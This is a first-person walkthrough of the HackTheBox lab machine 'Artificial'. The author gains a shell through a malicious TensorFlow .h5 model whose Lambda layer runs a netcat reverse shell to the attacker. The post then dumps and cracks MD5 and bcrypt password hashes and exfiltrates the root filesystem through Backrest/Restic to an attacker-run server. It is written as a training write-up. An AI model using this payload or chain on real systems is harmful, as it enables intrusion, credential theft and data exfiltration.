In this article I’ll show you a walkthrough of my solution to the HTB machine Artificial.
Artificial is rated Easy on HackTheBox and runs a modern Linux environment with a web application that exposes TensorFlow functionality. The box focuses on interpreting and exploiting machine-learning components on the web layer, then shifts into credential cracking, SSH movement, and finally privilege escalation through a misconfigured backup tool.
Target IP: 10.10.11.74
Operating System: Linux
Difficulty: Easy
Attack Surface:

- A web application for uploading and running AI models
- SSH

These components define the core exploitation path. The next step is to dive deeper with enumeration to locate the initial foothold.
I started with a quick service and version scan against the target.
```
nmap -sV -sC -Pn 10.10.11.74
```

Nmap returned a very small attack surface:
Only SSH and a single web service were exposed, which immediately suggests the entry point is going to be through the web layer rather than brute forcing SSH. The site title, Artificial, already hints at some kind of AI or ML related functionality behind the scenes.
To clean up the workflow, I added the hostname to my hosts file:
```
sudo sh -c 'echo "10.10.11.74 artificial.htb" >> /etc/hosts'
```

With the host mapped, I browsed to the site.
The landing page introduces Artificial, a platform for uploading and running AI models. No login creds are provided, so I created a new account. The app does not enforce email verification, so anything works.
Once inside, I landed on /dashboard. This is where the real functionality lives. The page advertises model management and exposes two interesting links:
- requirements.txt
- Dockerfile

Both files are downloadable directly from the application. Opening them confirms something important: the backend is loading TensorFlow CPU 2.13.1 inside Python 3.8.
TensorFlow model loading is known for executing arbitrary Python code if Lambda layers are allowed and not sanitized. The presence of a model upload form that accepts .h5 files is a clear indicator that this is the entry point.
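To see why this is dangerous, it helps to know that Keras has historically serialized a Lambda layer's function by marshalling its bytecode into the saved model, then rebuilding and trusting that function on load. The sketch below mimics that round trip with only the standard library (no TensorFlow required), to show that whatever code is embedded at save time runs at load time:

```python
import marshal
import types

# Keras (2.x era) serializes a Lambda layer's function by marshalling its
# __code__ object into the model file. This mimics that save/load round
# trip without TensorFlow: any bytecode we embed runs when reconstructed.

def payload(x):
    # In the real exploit this body would spawn a reverse shell.
    return f"executed with {x!r}"

# "Save": roughly what ends up inside the .h5 file.
blob = marshal.dumps(payload.__code__)

# "Load": the server unmarshals the blob and rebuilds a callable --
# at this point the attacker's code is live in the server process.
restored = types.FunctionType(marshal.loads(blob), {})

print(restored("input tensor"))  # the rebuilt function runs our code
```

The server never inspects what the function does; it just calls it during prediction, which is exactly the behavior the exploit abuses.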
At this point the attack path is straightforward:
build a malicious TensorFlow model, upload it, wait for the backend to load it, and get code execution.
Since the application processes user supplied .h5 models, the safest way to craft a compatible payload is to mirror the target environment. The Dockerfile provided by the site made that trivial.
I dropped their Dockerfile and requirements into a working directory and built the environment they expect:
```
sudo docker build -t artificial-exploit .
```

Inside this container, I created a minimal Keras model with a Lambda layer that executes a reverse shell when loaded.
exploit.py:
```python
import tensorflow as tf

def exploit(x):
    import os
    # Named-pipe reverse shell: create a FIFO, wire /bin/sh's stdin/stdout
    # through it, and connect back to the attacker's listener with nc.
    os.system("rm -f /tmp/f;mknod /tmp/f p;cat /tmp/f|/bin/sh -i 2>&1|nc <MY-IP> 4444 >/tmp/f")
    return x

model = tf.keras.Sequential()
model.add(tf.keras.layers.Input(shape=(64,)))
model.add(tf.keras.layers.Lambda(exploit))
model.compile()
model.save("exploit.h5")
```
With a listener running:
```
nc -nlvp 4444
```

I uploaded the model from the dashboard and triggered it by selecting View Predictions. As expected, TensorFlow executed the Lambda layer on the server, which handed me a shell immediately.
The reverse shell dropped me in the context of the application user. I started with a quick look around the web directory.
```
ls -la
```

One directory stood out immediately: instance. Flask applications commonly stash their SQLite databases there, and inside I found exactly what I expected:
```
instance/
instance/users.db
```

A SQLite file in a Flask project almost always means user authentication data. I confirmed the file type:
```
file instance/users.db
```

SQLite 3.x. Perfect.
I opened the database:
```
sqlite3 instance/users.db
```

Once inside, I checked the tables:
```
.tables
```

Two tables were present: user and model. The user table was the obvious target. I inspected its structure:
```
PRAGMA table_info(user);
```

The schema contained the expected fields: id, username, email, and password (hashed). I dumped everything:
```
SELECT * FROM user;
```

With that, I had all users and their password hashes.
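The same extraction can be scripted rather than done interactively. A minimal sketch with Python's built-in sqlite3 module, using the column names from the PRAGMA output above (the demo rows here are placeholders, not the box's real data):

```python
import sqlite3

# Scripted version of the sqlite3-CLI steps: pull every password hash
# out of the Flask app's `user` table, one per line for hashcat.

def dump_hashes(conn: sqlite3.Connection) -> list:
    return [row[0] for row in conn.execute("SELECT password FROM user")]

# Demo against an in-memory database with the same schema:
conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE user (id INTEGER PRIMARY KEY, username TEXT, "
    "email TEXT, password TEXT)"
)
conn.executemany(
    "INSERT INTO user (username, email, password) VALUES (?, ?, ?)",
    [("gael", "gael@example.com", "<md5-hash-1>"),
     ("robert", "robert@example.com", "<md5-hash-2>")],
)
print("\n".join(dump_hashes(conn)))  # paste this output into hash.txt
```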
I copied the hashes into a file on my attacker machine:
```
echo "
*****
" > hash.txt
```

Then ran Hashcat:
```
hashcat -m 0 hash.txt /usr/share/wordlists/rockyou.txt --force
```

Once it finished, I displayed the cracked results:
```
hashcat -m 0 hash.txt --show
```

Two real credentials dropped out:
```
gael : *****
robert : *****
```

These were likely system users.
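Mode 0 in hashcat means raw, unsalted MD5, so cracking is nothing more than hashing each wordlist candidate and comparing digests. A minimal sketch of that loop (the hash and wordlist here are toy values, not the box's real data):

```python
import hashlib

# What `hashcat -m 0` does at its core: hash every candidate and
# compare against the target digest. Unsalted MD5 makes this fast
# enough that rockyou.txt-sized lists fall in seconds.

def crack_md5(target_hex, wordlist):
    for candidate in wordlist:
        if hashlib.md5(candidate.encode()).hexdigest() == target_hex:
            return candidate
    return None

target = hashlib.md5(b"summer2024").hexdigest()  # stand-in dumped hash
print(crack_md5(target, ["letmein", "password1", "summer2024"]))
# prints the matching candidate, or None if the wordlist misses
```

This is also why unsalted MD5 for stored passwords is a finding in itself: identical passwords produce identical hashes, and no per-user salt slows the attack down.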
With credentials in hand, I tried SSH directly:
```
ssh gael@artificial.htb
```

Gael’s login succeeded. Robert’s account existed but did not have a valid shell. I confirmed available system shells:
```
getent passwd | awk -F: '$7 ~ /sh$/ {print $1 ":" $7}'
```

Valid shells:
```
root:/bin/bash
gael:/bin/bash
app:/bin/bash
```

No SSH restrictions were in place:
```
grep -i AllowUsers /etc/ssh/sshd_config
```

From here, I gathered local context:
```
id
sudo -l
ss -tulnp | grep LISTEN
ls -la /var/backups
```

Findings:
```
/var/backups/backrest_backup.tar.gz
```

That backup was the next obvious target.
I pulled the backup to my machine:
```
scp gael@artificial.htb:/var/backups/backrest_backup.tar.gz .
```

It came down as a plain tar archive, not gzip. I renamed and extracted it:
```
mv backrest_backup.tar.gz backrest_backup.tar
tar -xvf backrest_backup.tar
```

The extraction revealed the following structure:
```
backrest/
backrest/restic
backrest/oplog.sqlite-wal
backrest/oplog.sqlite-shm
backrest/.config/
backrest/.config/backrest/
backrest/.config/backrest/config.json
backrest/oplog.sqlite.lock
backrest/backrest
backrest/tasklogs/
backrest/tasklogs/logs.sqlite-shm
backrest/tasklogs/.inprogress/
backrest/tasklogs/logs.sqlite-wal
backrest/tasklogs/logs.sqlite
backrest/oplog.sqlite
backrest/jwt-secret
backrest/processlogs/
backrest/processlogs/backrest.log
backrest/install.sh
```

The extracted structure revealed Backrest and Restic artifacts, along with multiple SQLite databases, logs, and configs. One file stood out:
```
backrest/.config/backrest/config.json
```

Inside was a base64-encoded bcrypt password. I decoded it:
```
cat backrest/.config/backrest/config.json \
  | grep password \
  | awk -F\" '{print $4}' \
  | base64 -d > bcrypt.hash
```

Then cracked it:
```
hashcat -m 3200 bcrypt.hash /usr/share/wordlists/rockyou.txt --force
```

This password belonged to the administrator account for the service running internally on port 9898.
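The grep/awk pipeline works but is brittle if the JSON layout shifts. A sturdier sketch parses config.json as JSON and decodes the base64 field directly; the key path (`auth` → `users` → `passwordBcrypt`) is an assumption based on Backrest's config layout, so adjust it to whatever the file actually shows:

```python
import base64
import json

# Parse Backrest's config.json properly instead of grepping it.
# ASSUMPTION: the bcrypt hash lives at auth.users[0].passwordBcrypt,
# base64-encoded; verify against the real file before relying on this.

def extract_bcrypt(config_text: str) -> bytes:
    cfg = json.loads(config_text)
    encoded = cfg["auth"]["users"][0]["passwordBcrypt"]
    return base64.b64decode(encoded)

# Demo with a stand-in config (not the real secret):
sample = json.dumps({
    "auth": {"users": [{
        "name": "backrest_root",
        "passwordBcrypt": base64.b64encode(b"$2a$10$example").decode(),
    }]}
})
print(extract_bcrypt(sample))  # write this to bcrypt.hash for hashcat -m 3200
```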
I forwarded the local service through SSH:
```
ssh -L 9898:127.0.0.1:9898 gael@artificial.htb
```

Navigating to:
```
http://localhost:9898
```

I logged in with:
```
Username: backrest_root
Password: *****
```

This gave me full access to Backrest’s management interface.
Backrest wraps Restic, and Restic happens to be listed on GTFOBins for privilege escalation when executed through sudo. The restore and backup operations can be pointed at an attacker controlled Restic server to retrieve root level data.
I started a Restic server on my machine:
```
rest-server --path /tmp/restic-data --listen :12345 --no-auth
```

Then, through the Backrest panel, I added a new repository pointing to my listener and issued commands to back up the root filesystem.
Once the operation completed, I listed the snapshots:
```
restic -r /tmp/restic-data/<repo-name> snapshots
```

Then restored them:
```
restic -r /tmp/restic-data/<repo-name> restore <snapshot-id> --target ./restore
```

Inside the restored tree:
```
cat restore/root/root.txt
```

That revealed the final root flag.
Artificial shows how a single insecure machine learning feature can compromise an entire system. By uploading a malicious TensorFlow .h5 model, I gained remote code execution through unsafe Lambda deserialization. From there, I dumped and cracked user hashes from the exposed SQLite database and moved laterally into a real SSH account.
Further enumeration uncovered a Backrest backup archive containing credentials for an internal admin interface. After cracking the bcrypt password and port forwarding the service, I gained full control of Backrest and abused its Restic integration to exfiltrate and restore root level data. This provided access to the root flag.
The machine demonstrates the risks of unvalidated ML model loading, weak secrets management, and misconfigured backup systems.